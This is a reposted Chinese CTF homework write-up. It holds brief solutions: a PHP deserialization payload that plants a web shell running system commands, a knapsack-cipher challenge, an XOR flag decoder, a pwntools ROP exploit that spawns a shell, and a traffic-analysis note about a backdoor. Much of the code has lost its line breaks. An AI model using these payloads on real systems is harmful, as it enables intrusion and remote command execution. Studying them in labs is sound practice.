欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 八卦 > 2.9作业

2.9作业

2025/3/1 22:12:06 来源:https://blog.csdn.net/2401_87409653/article/details/145888375  浏览:    关键词:2.9作业

1

 绕过wakeup,sleep

$u,$p

code=$u.$p

<?php
class ctfshowvip
{public $username;public $password;public $code;public function __construct($u, $p){$this->username = $u;$this->password = $p;}
}
$c = new ctfshowvip('877.php',"<?php system('tac /f*');?>");
echo serialize($c);

2

 私钥由公钥产生

from Crypto.Util.number import *
import random
from secret import flagdef GET_KEY(n):sum=2key=[1]for i in range(n):r=random.randint(0,1)x=sum+random.randint(0,n)*rkey.append(x)sum+=xreturn keydef enc(m,k):cipher_list = []for i in range(len(m)):if m[i] == 1:cipher_list.append(m[i] * k[i])cipher = sum(cipher_list)return cipherm=bytes_to_long(flag)
m = [int(bit) for byte in flag for bit in format(byte, '08b')]
key=GET_KEY(len(m))
c=enc(m,key)with open('output.txt', 'w') as f:f.write(str(c))f.write(str(key))

3

 攻防世界666

封装函数,双击追踪flag

strcmp追踪flag encode以后的字符

a2="izwhroz\"\"w\"v.K\".Ni"
key=18
v3=""
flag=""#操作,但长度不变的for i in range(0,18,3):v3=a2[i]flag+=chr((ord(v3)^key) - 6)v3=a2[i+1]flag+=chr((ord(v3)^key) +6)v3=a2[i+2]flag+=chr((ord(v3)^key)^6)
#三个一组,1,2,3


4

from pwn import *
context.arch="amd64"io =process("./rop")
elf=ELF("./rop")#全局搜索函数
system_addr=elf.sym["system"]sh_addr=next(elf.search(b"sh\x00"))#asm
pop_rdi_ret=next(elf.search(asm("pop rdi; ret")))
#获得含有return的地址
ret_addr=next(elf.search(asm("ret")))payload = b"b"*(0x20+0x8)+p64(ret_addr)
payload+=p64(pop_rdi_ret)+p64(sh_addr)+p64(system_addr)io.sendline(payload)
io.interactive()

 

5

“找出攻击者的IP”

http协议中,

可疑:POST了hacker.php,追踪hacker.php,url解码,确认是开了个后门

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词